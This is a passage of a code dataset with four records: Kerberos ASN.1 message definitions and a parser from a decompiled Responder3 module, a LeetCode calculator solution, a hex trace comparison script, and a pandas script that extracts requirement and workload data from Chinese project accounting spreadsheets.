krb5int32, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'seq-number', krb5uint32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 's-address', HostAddress, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'r-address', HostAddress, {'tag_type':TAG, 'tag':5, 'optional':True})]\n\n\nclass KRB_CRED(core.Sequence):\n explicit = (\n APPLICATION, 22)\n _fields = [\n (\n 'pvno', core.Integer, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', core.Integer, {'tag_type':TAG, 'tag':1}),\n (\n 'tickets', SequenceOfTicket, {'tag_type':TAG, 'tag':2}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':3})]\n\n\nclass KrbCredInfo(core.Sequence):\n _fields = [\n (\n 'key', EncryptionKey, {'tag_type':TAG, 'tag':0}),\n (\n 'prealm', Realm, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'pname', PrincipalName, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'flags', TicketFlags, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'authtime', KerberosTime, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'starttime', KerberosTime, {'tag_type':TAG, 'tag':5, 'optional':True}),\n (\n 'endtime', KerberosTime, {'tag_type':TAG, 'tag':6, 'optional':True}),\n (\n 'renew-till', KerberosTime, {'tag_type':TAG, 'tag':7, 'optional':True}),\n (\n 'srealm', Realm, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':9, 'optional':True}),\n (\n 'caddr', HostAddresses, {'tag_type':TAG, 'tag':10, 'optional':True})]\n\n\nclass SequenceOfKrbCredInfo(core.SequenceOf):\n _child_spec = KrbCredInfo\n\n\nclass EncKrbCredPart(core.Sequence):\n explicit = (\n APPLICATION, 29)\n _fields = [\n (\n 'ticket-info', SequenceOfKrbCredInfo, {'tag_type':TAG, 'tag':0}),\n (\n 'nonce', krb5int32, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'timestamp', KerberosTime, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'usec', krb5int32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 's-address', HostAddress, {'tag_type':TAG, 'tag':4, 'optional':True}),\n (\n 'r-address', HostAddress, {'tag_type':TAG, 'tag':5, 'optional':True})]\n\n\nclass KRB_ERROR(core.Sequence):\n explicit = (\n APPLICATION, 30)\n _fields = [\n (\n 'pvno', krb5int32, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', krb5int32, {'tag_type':TAG, 'tag':1}),\n (\n 'ctime', KerberosTime, {'tag_type':TAG, 'tag':2, 'optional':True}),\n (\n 'cusec', krb5int32, {'tag_type':TAG, 'tag':3, 'optional':True}),\n (\n 'stime', KerberosTime, {'tag_type':TAG, 'tag':4}),\n (\n 'susec', krb5int32, {'tag_type':TAG, 'tag':5}),\n (\n 'error-code', krb5int32, {'tag_type':TAG, 'tag':6}),\n (\n 'crealm', Realm, {'tag_type':TAG, 'tag':7, 'optional':True}),\n (\n 'cname', PrincipalName, {'tag_type':TAG, 'tag':8, 'optional':True}),\n (\n 'realm', Realm, {'tag_type':TAG, 'tag':9}),\n (\n 'sname', PrincipalName, {'tag_type':TAG, 'tag':10}),\n (\n 'e-text', core.GeneralString, {'tag_type':TAG, 'tag':11, 'optional':True}),\n (\n 'e-data', core.OctetString, {'tag_type':TAG, 'tag':12, 'optional':True})]\n\n\nclass ChangePasswdDataMS(core.Sequence):\n _fields = [\n (\n 'newpasswd', core.OctetString, {'tag_type':TAG, 'tag':0}),\n (\n 'targname', PrincipalName, {'tag_type':TAG, 'tag':1, 'optional':True}),\n (\n 'targrealm', Realm, {'tag_type':TAG, 'tag':2, 'optional':True})]\n\n\nclass EtypeList(core.SequenceOf):\n _child_spec = ENCTYPE\n\n\nclass KerberosResponse(core.Choice):\n _alternatives = [\n (\n 'AS_REP', AS_REP, {'implicit': (APPLICATION, 11)}),\n (\n 'TGS_REP', TGS_REP, {'implicit': (APPLICATION, 13)}),\n (\n 'KRB_ERROR', KRB_ERROR, {'implicit': (APPLICATION, 30)})]\n\n\nclass KRBCRED(core.Sequence):\n explicit = (\n APPLICATION, 22)\n _fields = [\n (\n 'pvno', core.Integer, {'tag_type':TAG, 'tag':0}),\n (\n 'msg-type', core.Integer, {'tag_type':TAG, 'tag':1}),\n (\n 'tickets', SequenceOfTicket, {'tag_type':TAG, 'tag':2}),\n (\n 'enc-part', EncryptedData, {'tag_type':TAG, 'tag':3})]\n\n\nclass KerberosParser:\n\n def __init__(self):\n pass\n\n @staticmethod\n async def from_streamreader(reader):\n lb = await read_or_exc(reader, 4)\n length = int.from_bytes(lb, byteorder='big', signed=False)\n data = await read_or_exc(reader, length)\n krb_message = AS_REQ.load(data)\n return krb_message","sub_path":"pycfiles/Responder3-0.0.1-py3.7/KerberosV5.cpython-37.py","file_name":"KerberosV5.cpython-37.py","file_ext":"py","file_size_in_byte":25564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"103482644","text":"class Solution:\n def calculate(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n \n # remove spaces\n s = ''.join(s.split())\n sLen = len(s)\n\n def findNextNum(cur):\n # find the next number and move the cursor to the next position after it\n numStart = cur\n while cur < sLen and s[cur].isdigit(): cur += 1\n return (int(s[numStart:cur]), cur) if cur > numStart else None\n\n num, cur = findNextNum(0)\n if num is None: raise Exception('Invalid input.')\n stack = [num]\n\n while cur < sLen:\n op = s[cur]\n cur += 1\n num, cur = findNextNum(cur)\n\n if op == '+':\n stack.append(num)\n elif op == '-':\n stack.append(-num)\n elif op == '*':\n stack[-1] *= num\n elif op == '/':\n stack[-1] = int(stack[-1] / num)\n\n return sum(stack)","sub_path":"227 Basic Calculator II/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"458330090","text":"#!/usr/local/bin/python\nimport random\nimport string\nimport os\ndef deleteDul(file_name, file_backup_name):\n f_source = open(file_name, 'r')\n f_backup = open(file_backup_name, 'w')\n tmp = \"\"\n for line in f_source:\n if line.strip('\\n') != tmp.strip('\\n'):\n f_backup.write(\"0x\" + line[25:33] + \"\\n\")\n f_backup.write(\"0x\" + line[17:25] + \"\\n\")\n tmp = line\n f_source.close()\n f_backup.close()\n\ndef matrixC2hex(file_name, file_hex_name):\n fd_source = open(file_name, 'r')\n fd_hex = open(file_hex_name, 'w')\n for line in fd_source:\n fd_hex.write(\"0x\" + format(hex(string.atoi(line.strip(\"\\n\"))).lstrip(\"0x\"),\"0>8\") + '\\n')\n fd_source.close()\n fd_hex.close()\n\ndef autoCmp(file1, file2):\n if os.path.isfile(file1) == False:\n print(file1 + \"dose not exist!\")\n return\n if os.path.isfile(file2) == False:\n print(file2 + \"dose not exist!\")\n return\n fd_1 = open(file1, 'r')\n fd_2 = open(file2, 'r')\n line1 = fd_1.readline()\n line2 = fd_2.readline()\n cnt = 0\n while line1 or line2:\n cnt = cnt + 1\n if line1 != line2:\n print(\"%30s :\" % \"Error\")\n print(\"%30s : line:%d : %s\" % (file1, cnt, line1.strip(\"\\n\")))\n print(\"%30s : line:%d : %s\" % (file2, cnt, line2.strip(\"\\n\")))\n line1 = fd_1.readline()\n line2 = fd_2.readline()\n fd_1.close()\n fd_2.close()\n\ndef main():\n result_file = \"my_wbslv_trace.dat\"\n if os.path.isfile(result_file) == False:\n print(result_file + \"dose not exist!\")\n return\n result_file_hex = result_file + \".hex\"\n deleteDul(result_file, result_file_hex)\n matrixC = \"C.txt\"\n if os.path.isfile(matrixC) == False:\n print(matrixC + \"dose not exist!\")\n return\n matrixCHex = \"C.hex\"\n matrixC2hex(matrixC, matrixCHex)\n autoCmp(matrixCHex, result_file_hex)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dsp/2/result/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"405993959","text":"#-*- coding: utf-8 -*-\n# @Time : 2020/6/16 10:03\n# @Author : Nivina\n# @Email : nivinanull@163.com\n# @File : read_attachment9.py\n\nimport numpy as np, pandas as pd\nimport os, sys, platform\nimport copy, re\nimport math\nimport datetime\nimport logging\nfrom collections import Counter\nfrom pathlib import Path\nfrom explore import get_maintenance_reqs as gmr\nimport pickle\n\npd.set_option('display.max_columns',20) #给最大列设置为10列\npd.set_option('display.max_rows',10)#设置最大可见10行\npd.set_option('mode.chained_assignment','raise') # 屏蔽SettingWithCopyWarning\n\ncurrent_year = str(datetime.datetime.now().year)\n\ncosmic_cols = ['type', 'batch', 'project_name', 'projectNO', 'requirementNO', 'requirement_name', 'requirement_detail', 'advocator',\n 'days_spent', 'coding_requirement']\n\nnoncosmic_cols = ['type', 'batch', 'project_name', 'projectNO', 'requirementNO', 'requirement_name', 'work_cat', 'work_name',\n 'work_detail', 'days_spent']\n\ntemp_noncosmic_cols = ['requirementNO', 'requirement_name', 'work_cat', 'work_name', 'work_detail', 'days_spent']\n\ncosmic_info = pd.DataFrame(columns=cosmic_cols)\n\n# 非cosmic的 人天、 工作类型、工作名称、工作内容详细描述加进去\nnoncosmic_info = pd.DataFrame(columns=noncosmic_cols)\n\n\nyear_list = [str(i + datetime.datetime.now().year) for i in range(-5, 6)]\n\n\ndef format1(item):\n # re_no = re.split('年|需求|序号|号|编号|\\d季度|季度\\d|' + current_year, item)\n if item:\n # item = ''.join(re.split('\\d季度|季度\\d|' + '|'.join(year_list), item))\n item = ''.join(re.split('[1-4]Q|Q[1-4]|[1-4]季度|季度[1-4]', item))\n re_no = re.findall(\"\\d+\", item)\n if len(re_no) >= 1:\n re_no = set(re_no) - set(year_list)\n if len(re_no) == 1:\n int_nu = int(re_no.pop())\n return int_nu\n return None\n\n\ndef format2(item):\n if item:\n re_no = re.findall(r\"\\d+\", item)\n re_no = [x for x in re_no if x not in year_list]\n if len(re_no) >= 1:\n for n in re_no:\n if n == item:\n return None\n m = re.search('^(.*需求.*?|.*序号.*?|.*编号.*?|)' + n, item)\n if m:\n matched = m.group(0)\n if ('合计' in matched) or (('共'+ n in item) or (n + '个' in item) or (n + '需求' in item) and len(item) <= 8):\n return None\n name = ''\n try:\n name = re.split(':|:|' + matched, item)\n except Exception as e:\n return None\n name = ''.join(name)\n if not name:\n return None\n return int(n), name\n return None\n\n\ndef get_cosmic_info(cosmic_sheet):\n temp_info = pd.DataFrame(columns=cosmic_cols)\n part1 = cosmic_sheet[cosmic_sheet.iloc[:, 0].astype(str).str.strip() == '需求序号'].reset_index()\n index_stride = list(part1['index'])\n index_stride.append(cosmic_sheet.shape[0])\n # temp_info['start'] = index_stride[:-1]\n # temp_info['end'] = index_stride[1:]\n index_stride = [{'start':index_stride[i], 'end':index_stride[i + 1]} for i in range(len(index_stride) - 1)]\n temp_info['index_stride'] = index_stride\n part1 = part1.drop(columns='index').dropna(axis=1) ###去重空字段\n if part1.empty:\n return False, 'ERROR: 《表2 需求开发工作量核算表》没有找到需求序号'\n requirement_count = part1.shape[0]\n\n if part1.shape[1] > 4:\n part1 = part1.T.drop_duplicates().T\n if part1.shape[1] == 4 and not (part1.iloc(axis=1)[1].astype(str).str.strip() == '').any():\n temp_info['requirementNO'] = part1.iloc[:, 1].astype(str)\n temp_info['requirementNO'] = temp_info['requirementNO'].map(format1)\n if temp_info['requirementNO'].isnull().any():\n return False, 'ERROR: 请检查《表2 需求开发工作量���算表》需求序号填写信息是否满足:xxxx年需求序号xxxx 的格式'\n else:\n return False, 'ERROR: 请检查《表2 需求开发工作量核算表》需求序号、需求名称格式'\n\n # 找到需求名称列且需求名称不能为空\n b1 = (part1.iloc[:, 2].str.strip() == '需求名称').all()\n b2 = (part1.iloc(axis=1)[3].str.strip() == '').any()\n if b1 and not b2:\n temp_info['requirement_name'] = part1.iloc[:, 3]\n else:\n return False, 'ERROR: 请检查《表2 需求开发工作量核算表》需求名称是否存在'\n part2 = cosmic_sheet[cosmic_sheet.iloc(axis=1)[0].str.strip() == '需求提出人'].reset_index()\n if part2.empty:\n print('WARNING: 《表2 需求开发工作量核算表》 没有找到需求提出人相关行' + '\\n', str(file_path))\n temp_info['advocator'] = '无'\n temp_info['days_spent'] = -1\n else:\n part2.drop(columns=[i for i in part2.columns if part2[i].isna().all()], inplace=True)\n if part2.shape[0] == requirement_count and part2.shape[1] >= 5:\n temp_info['advocator'] = part2.iloc[:, 2].fillna('无').astype(str)\n no_advocator = list(temp_info[temp_info.advocator == '无'].requirementNO)\n if len(no_advocator) > 0:\n print('WARNING: 《表2 需求开发工作量核算表》 <需求提出人> 存在漏填\\t' + '需求编号为:' + str(no_advocator) + '\\n', str(file_path))\n\n if (part2.iloc[:, 3].astype(str).str.strip().map(lambda x: True if '实际工作量' in x else False)).all():\n # print('part2.iloc[:, 4]_before ' * 8 + '\\n', list(part2.iloc[:, 4]))\n part2.iloc[:, 4].fillna(-1, inplace=True)\n temp_info['days_spent'] = part2.iloc(axis=1)[4].astype(str).map(lambda x: re.findall(\"\\d+\", x)[0] if (len(re.findall(\"\\d+\", x)) == 1) else -1).astype(float)\n # print('part2.iloc[:, 4]_after ' * 8 + '\\n', list(temp_info['days_spent']))\n located_nan2 = list(temp_info[temp_info.days_spent == -1]['requirementNO'].values)\n if len(located_nan2) > 0:\n print('WARNING: 《表2 需求开发工作量核算表》 <实际工作量> 存在漏填\\t', '需求序号为:' + str(located_nan2) + '\\n', str(file_path))\n else:\n temp_info['days_spent'] = -1\n print('WARNING: 《表2 需求开发工作量核算表》 无法定位 <实际工作量> 相关信息' + '\\n', str(file_path))\n else:\n print('WARNING: 《表2 需求开发工作量核算表》需求提出人相关行\\n' +\n '1.需求名称 相关行行数必须与需求序号条数保持一致'\n '2.是否满足<需求提出人、实际工作量(人天)、需求预估工作量(人天)> 格式' + '\\n',\n str(file_path))\n temp_info['advocator'] = '无'\n temp_info['days_spent'] = -1\n\n part3 = cosmic_sheet[cosmic_sheet.iloc[:, 0].str.strip() == '需求描述'].reset_index(drop=True)\n if part3.empty:\n return False, 'ERROR: 《表2 需求开发工作量核算表》 没有找到需求描述'\n part3.iloc(axis=1)[2].fillna('', inplace=True)\n part3.dropna(inplace=True, axis=1)\n\n if part3.shape[0] == requirement_count:\n temp_info['requirement_detail'] = part3.iloc[:, 1]\n else:\n return False, 'ERROR: 《表2 需求开发工作量核算表》提交的需求缺少需求详情'\n\n coding_selection = ['代码', '代码开发', '数据脚本', '数据配置']\n coding_requirement_indices = cosmic_sheet[cosmic_sheet.iloc[:, 0].str.strip().isin(coding_selection)].index\n if coding_requirement_indices.empty:\n return False, 'ERROR: 该项目没有代码开发信息'\n coding_requirement_indices = [coding_requirement_indices[0]] + \\\n [coding_requirement_indices[i] for i in range(1, len(coding_requirement_indices))if ((coding_requirement_indices[i] - coding_requirement_indices[i-1]) > 1)]\n\n coding_requirement_indices.extend([(i+1) for i in coding_requirement_indices] + [(i+2) for i in coding_requirement_indices])\n coding_requirement = cosmic_sheet.iloc[coding_requirement_indices, :]\n coding_requirement = coding_requirement.drop(columns=[i for i in coding_requirement.columns if coding_requirement[i].isna().all()])\n\n if len(coding_requirement.columns) < 2:\n temp_info['coding_requirement'] = np.nan\n else:\n coding_requirement = coding_requirement.loc[(coding_requirement.iloc(axis=1)[1].astype(str).str.contains('功能'))\n & (coding_requirement.iloc(axis=1)[1].astype(str).str.contains('列表'))]\n\n if coding_requirement.shape[0] != len(coding_requirement_indices) / 3:\n print('功能点名称列表 doesnt match 代码开发' + '\\n', str(file_path), '\\n', '代码开发->功能点名称 相关行数:',\n coding_requirement.shape[0], '代码开发相关行数:', int(len(coding_requirement_indices) / 3))\n coding_requirement = coding_requirement.iloc(axis=1)[1:3]\n coding_requirement.iloc(axis=1)[1].fillna('无', inplace=True)\n coding_requirement_list = []\n if not coding_requirement.empty:\n coding_requirement.columns = ['name', 'detail']\n coding_requirement.reset_index(inplace=True)\n for r in temp_info['index_stride']:\n value = coding_requirement[coding_requirement['index'].between(r['start'], r['end'])].detail.values\n if value and (str(value[0]).strip() != '无') and (str(value[0]).strip() != '不涉及'):\n coding_requirement_list.extend(value)\n else:\n # 没有找到<代码开发>相关行\n coding_requirement_list.append(np.nan)\n else:\n coding_requirement_list = [np.nan] * requirement_count\n temp_info['coding_requirement'] = coding_requirement_list\n\n if temp_info.coding_requirement.hasnans:\n suspicious_req = temp_info.requirementNO[temp_info.coding_requirement.isna()]\n print('WARNING -- 发现没有<代码描述>的cosmic需求,序号:',suspicious_req.values, '\\n', str(file_path))\n\n temp_info.drop(columns=['index_stride'], inplace=True)\n temp_info['batch'] = batch_from_cat ### current_batch\n # print('temp_info_last '* 5 + '\\n', temp_info)\n\n return True, temp_info\n\n\n# temp_noncosmic_cols = ['requirementNO', 'requirement_name', 'work_cat', 'work_name', 'work_detail', 'days_spent']\ndef get_noncosmic_info(noncosmic_sheet):\n temp_info = pd.DataFrame(columns=temp_noncosmic_cols)\n noncosmic_result = pd.DataFrame()\n if (noncosmic_sheet.iloc[:, 0] == '项目序号').any():\n start = (noncosmic_sheet[noncosmic_sheet.iloc[:, 0] == '项目序号']).index.values[0]\n noncosmic_sheet = noncosmic_sheet[start:]\n info_count = 0\n for i in range(noncosmic_sheet.shape[1]):\n # 找到文件非cosmic信息的有效开始部分\n if str(noncosmic_sheet.iloc[0, i]).strip() == '需求序号':\n temp_info['requirementNO'] = noncosmic_sheet.iloc[1:, i].astype(str)\n info_count += 1\n elif str(noncosmic_sheet.iloc[0, i]).strip() == '需求名称':\n temp_info['requirement_name'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '非COSMIC人天' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['days_spent'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '工作类型' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['work_cat'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '工作名称' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['work_name'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n elif '工作内容详细描述' in str(noncosmic_sheet.iloc[0, i]):\n temp_info['work_detail'] = noncosmic_sheet.iloc[1:, i]\n info_count += 1\n if info_count != 6:\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>的【需求序号、需求名称、非COSMIC人天、工作类型、工作名称、工作内容详细描述】是否完整'\n\n # 判断字段内容是否缺失,处理字段格式,需求序号统一处理成int,与cosmic部分保持一致\n temp_info.reset_index(drop=True, inplace=True)\n temp_info['requirementNO'] = temp_info['requirementNO'].map(format1)\n\n # 只取非cosmic信息的有效部分,过滤掉无效的尾部信息\n temp_info = temp_info[\n temp_info['work_cat'].notnull() & temp_info['work_name'].notnull() & temp_info['work_detail'].notnull() & temp_info['days_spent'].notnull()]\n if temp_info.empty:\n return False, 'ERROR:请检查<表4 非COSMIC评估工作量填报表>中【工作种类,工作名称,工作细节】能否被正确识别或为空'\n temp_info.update(temp_info[['requirementNO', 'requirement_name']].fillna(method='ffill'))\n # 检查requirementNO是否仍旧存在空值\n if temp_info['requirementNO'].isnull().any():\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>中需求序号是否存在漏填'\n temp_info['requirementNO'] = temp_info['requirementNO'].astype(int)\n temp_info['days_spent'] = temp_info['days_spent'].astype(float)\n # 防止需求序号漏填、错填 导致的需求丢失\n if len(set(temp_info['requirementNO'].astype(str) + temp_info['requirement_name'])) != len(set(temp_info['requirementNO'])):\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>中的需求序号、需求名称是否存在漏填或错填'\n for requirementNO, part in temp_info.groupby(['requirementNO']):\n if len(set(part['days_spent'].dropna().to_list())) == 1:\n temp = pd.DataFrame()\n temp['requirementNO'] = [requirementNO]\n temp['requirement_name'] = [part['requirement_name'].iloc[0]]\n temp['days_spent'] = [set(part['days_spent'].dropna().to_list()).pop()]\n temp['work_cat'] = [part['work_cat'].to_list()]\n temp['work_name'] = [part['work_name'].to_list()]\n temp['work_detail'] = [part['work_detail'].to_list()]\n noncosmic_result = noncosmic_result.append(temp, ignore_index=True)\n noncosmic_result.requirementNO = noncosmic_result.requirementNO.astype(int)\n else:\n return False, 'ERROR: 请检查<表4 非COSMIC评估工作量填报表>中的 非COSMIC人天 填写是否正确(同一个需求只能对应一个)'\n return True, noncosmic_result\n else:\n return False, 'ERROR: 无法定位<表4 非COSMIC评估工作量填报表>中的项目序号'\n\n\ndef get_requirements(sketch):\n temp = pd.DataFrame()\n project_name_list = []\n project_name = ''\n for r in range(3):\n for c in range(sketch.shape[1]):\n if str(sketch.iloc[r, c]).strip() == '项目名称':\n project_name_list = sketch.iloc[(r+1):, c].to_list()\n elif type(sketch.iloc[r, c]) == str and sketch.iloc[r, c].strip() == '需求名称':\n temp = sketch.iloc[(r+1):, c].astype(str)\n if temp.empty:\n return False, temp, 'ERROR, 定位不到<表1 工作量核算表 >中的需求名称'\n\n project_name_list = [x for x in project_name_list if type(x) == str and x.strip() != '合计' and x.strip() != '']\n if len(project_name_list) == 0:\n return False, temp, 'ERROR, 检查<表1 工作量核算表 >中的【项目名称】是否填写正确'\n project_name_list = re.split(':|:', project_name_list[0])\n if '项目序号' in project_name_list[0]:\n del(project_name_list[0])\n project_name = ''.join(project_name_list)\n else:\n project_name = ''.join(project_name_list)\n temp = temp.map(format2).dropna()\n if temp.empty:\n return False, temp, 'ERROR, 请检查<表1 工作量核算表 >中的需求名称是否满足{需求序号XXX:需求名称}的命名方式'\n temp = pd.DataFrame(temp.values, columns=['origin'])\n temp['requirementNO'] = [x[0] for x in temp.origin.values]\n temp['requirement_name'] = [x[1] for x in temp.origin.values]\n temp.drop(columns=['origin'], inplace=True)\n return True, temp, project_name\n\n\ndef read_cosmic_sheet(all, s2_key):\n s2 = all[s2_key]\n if s2.empty:\n return False, 'ERROR:请检查文件的《表2 需求开发工作量核算表》信息'\n else:\n return get_cosmic_info(s2)\n\n\ndef read_noncosmic_sheet(all, s4_key):\n\n if s4_key:\n s4 = all[s4_key]\n if s4.empty:\n return False, 'ERROR:请检查文件的《表4 非COSMIC评估工作量填报表》信息'\n else:\n return get_noncosmic_info(s4)\n else:\n return False, 'ERROR:请检查文件的《表4 非COSMIC评估工作量填报表》是否存在'\n\n\ndef check_nonfiles(noncosmic_result):\n for f in filenames:\n if ('非COSMIC' in f or '非COSMIC'.lower() in f) and not f.startswith('.') and ('__MACOSX' not in folderName):\n local_path = Path(folderName) / f\n try:\n sheet = pd.read_excel(local_path, sheet_name=None, header=None)\n key = list(sheet.keys())[0]\n Another_chance, noncosmic_result = read_noncosmic_sheet(sheet, key)\n return Another_chance, noncosmic_result\n except Exception as error:\n print('ERROR:读取文件出错——请检查文件: ' + str(local_path) + '\\n', error)\n return False, noncosmic_result\n\n\ndef persist(df, path):\n if (df['type'] == 'cosmic').all():\n file_persist = path / 'cosmic_info.pkl'\n elif (df['type'] == 'noncosmic').all():\n file_persist = path / 'noncosmic_info.pkl'\n\n if file_persist.is_file():\n his = pd.read_pickle(file_persist)\n his.append(df, ignore_index=True)\n his.to_pickle(file_persist)\n else:\n file_persist.parent.mkdir(exist_ok=True)\n df.to_pickle(file_persist)\n\n\nif platform.system() == 'Windows':\n # path = Path('C:\\\\ChinaMobile\\\\cosmic_files')\n path = Path('C:\\\\ChinaMobile\\\\cosmic_files\\\\20201218部门内工作量评审')\nelse:\n path = Path('./cosmic_files')\n\nfile_count = 0\nsketch_have_read = 0\ncosmic_have_read = 0\nnoncosmic_have_read = 0\n# 储存目录\npersist_path = Path('./data/20201218')\n# persist_path = Path('./data')\nfor folderName, subfolders, filenames in os.walk(path):\n temp_copy = copy.deepcopy(subfolders)\n for sf in temp_copy:\n if sf.startswith('.'):\n subfolders.remove(sf)\n for filename in filenames:\n # 避免重复读取或者临时文件 或者苹果系统格式的文件\n if ('工作量核算' in filename) and not filename.startswith('.') and ('__MACOSX' not in folderName):\n file_path = Path(folderName) / filename\n # 用于保存在需求中的文件路径\n file_trail = str(file_path).replace(str(path) + os.sep, '')\n # 去除文件名中的特殊字符\n filename = re.sub(\"[\\s+\\.\\!\\/\\:_,$%^*(+\\\"\\']+|[+——!,。?、:~@#¥%……&*()]+\", \"\", filename)\n # 正则匹配1000-2999年季度\n batch_re_str = '[12][0-9]{3}[Q|q][1-4]'\n batch_from_cat = re.search(batch_re_str, str(file_path))\n if not batch_from_cat:\n print('ERROR:无法从文件中获取batch信息,请检查文件目录 ')\n sys.exit()\n else:\n batch_from_cat = batch_from_cat[0]\n projectNO = '-1'\n # 从文件名中获取项目序号信息\n s = re.search('项目序号\\d+', filename)\n if s:\n matched = s.group(0)\n projectNO = re.findall(\"\\d+\", matched)\n if len(projectNO) == 1:\n projectNO = projectNO[0]\n # else:\n # print('ERROR:请检查文件名称是否满足《附件9:工作量核算表(结算)-项目序号xxx.xls》的文件格式\\n' + str(file_path))\n # continue\n # else:\n # print('ERROR:请检查文件名称是否满足《附件9:工作量核算表(结算)-项目序号xxx.xls》的文件格式\\n' + str(file_path))\n # continue\n s1_key, s2_key, s4_key = '', '', ''\n try:\n all = pd.read_excel(file_path, sheet_name=None, header=None)\n except Exception as error:\n print('ERROR:读取文件出错——请检查文件:' + str(file_path) + '\\n', error)\n continue\n\n file_count += 1\n if len(list(all.keys())) >= 4 and '非COSMIC' in list(all.keys())[3]:\n s1_key = list(all.keys())[0]\n s2_key = list(all.keys())[1]\n s4_key = list(all.keys())[3]\n elif len(list(all.keys())) >= 2:\n s1_key = list(all.keys())[0]\n s2_key = list(all.keys())[1]\n else:\n print('ERROR:请检查文件的《表2 需求开发工作量核算表》是否存在\\n' + str(file_path))\n continue\n\n # sheet1部分处理\n s1 = all[s1_key]\n FLAG, requirements_result, project_name = get_requirements(s1)\n if FLAG:\n sketch_have_read += 1\n else:\n print('requirements_result_fail_to_read'* 5 + '\\n', project_name, '\\n', requirements_result, '\\n', str(file_path))\n continue\n\n # sheet2、sheet4部分\n FLAG1, cosmic_result = read_cosmic_sheet(all, s2_key)\n if not FLAG1:\n print(cosmic_result, '\\n', str(file_path))\n else:\n cosmic_result['type'] = 'cosmic'\n cosmic_result['batch'] = batch_from_cat\n cosmic_result['projectNO'] = projectNO\n cosmic_result['project_name'] = project_name\n cosmic_result['file_trail'] = file_trail\n cosmic_result.drop_duplicates(subset=['requirement_name'], inplace=True)\n cosmic_info = cosmic_info.append(cosmic_result, ignore_index=True)\n cosmic_have_read += 1\n\n FLAG2, noncosmic_result = read_noncosmic_sheet(all, s4_key)\n if not FLAG2:\n if check_nonfiles(noncosmic_result)[0]:\n FLAG2, noncosmic_result = check_nonfiles(noncosmic_result)\n noncosmic_result['type'] = 'noncosmic'\n noncosmic_result['batch'] = batch_from_cat\n noncosmic_result['projectNO'] = projectNO\n noncosmic_result['project_name'] = project_name\n noncosmic_result['file_trail'] = file_trail\n noncosmic_result.drop_duplicates(subset=['requirement_name'], inplace=True)\n noncosmic_info = noncosmic_info.append(noncosmic_result, ignore_index=True)\n noncosmic_have_read += 1\n else:\n print(noncosmic_result, '\\n', str(file_path))\n\n else:\n noncosmic_result['type'] = 'noncosmic'\n noncosmic_result['batch'] = batch_from_cat\n noncosmic_result['projectNO'] = projectNO\n noncosmic_result['project_name'] = project_name\n noncosmic_result['file_trail'] = file_trail\n noncosmic_result.drop_duplicates(subset=['requirement_name'], inplace=True)\n noncosmic_info = noncosmic_info.append(noncosmic_result, ignore_index=True)\n noncosmic_have_read += 1\n\n\n # 判断是否在表2表4��需求是否和表1的需求一致\n set_union = set()\n if (FLAG1 and FLAG2):\n set_union = set(cosmic_result.requirementNO) | set(noncosmic_result.requirementNO)\n elif FLAG1:\n set_union = set(cosmic_result.requirementNO)\n\n elif FLAG2:\n set_union = set(noncosmic_result.requirementNO)\n\n if set(requirements_result.requirementNO) == set_union:\n continue\n else:\n print('WARNING:sheet2与sheet4的需求总集合与sheet1的需求集合不符\\n',\n 'sheet2与sheet4的需求总集合:\\n', set_union, '\\n',\n 'sheet1需求集合:\\n',set(requirements_result.requirementNO), '\\n',\n str(file_path))\n\n\nprint('检索到文件:' + str(file_count))\nprint('成功读取工作量核算汇总表的文件:' + str(sketch_have_read))\nprint('成功读取cosmic信息的文件:' + str(cosmic_have_read))\nprint('成功读取非cosmic信息的文件' + str(noncosmic_have_read))\n# ####################读取结果简单打印查看\nprint('results_over_here ' * 8 + '\\n', cosmic_info)\nprint(noncosmic_info)\n\n# #####################csv格式的文件用于查看读入需求\n# cosmic_info.to_csv(persist_path / 'cosmic.csv')\n# noncosmic_info.to_csv(persist_path / 'noncosmic.csv')\n\n# ##################### 需求信息持久化\n# ##################### 运行多次会导致将该次读取的数据多次追加,请确认同一批次的需求只持久化一次\npersist(cosmic_info, persist_path)\npersist(noncosmic_info, persist_path)\n\n\n# #####################运维需求读取\ndef read_maintenance_reqs():\n maintenance_reqs_source = Path('C:\\\\ChinaMobile\\\\maintenance_requirements')\n maintenance_reqs_target = Path('./data')\n get_reqs_obj = gmr.GetMaintenanceReqs(maintenance_reqs_source, maintenance_reqs_target)\n maintenance_reqs = get_reqs_obj.read_files()\n print(maintenance_reqs)\n # ################# 预检查是否存在需求填写重复\n get_reqs_obj.duplicate_check()\n # ################# 数据持久化,运行多次会导致将该次读取的数据多次追加,请确认同一批次的需求只持久化一次\n get_reqs_obj.persist()\n\n\n# ######################一并读取运维需求\n# 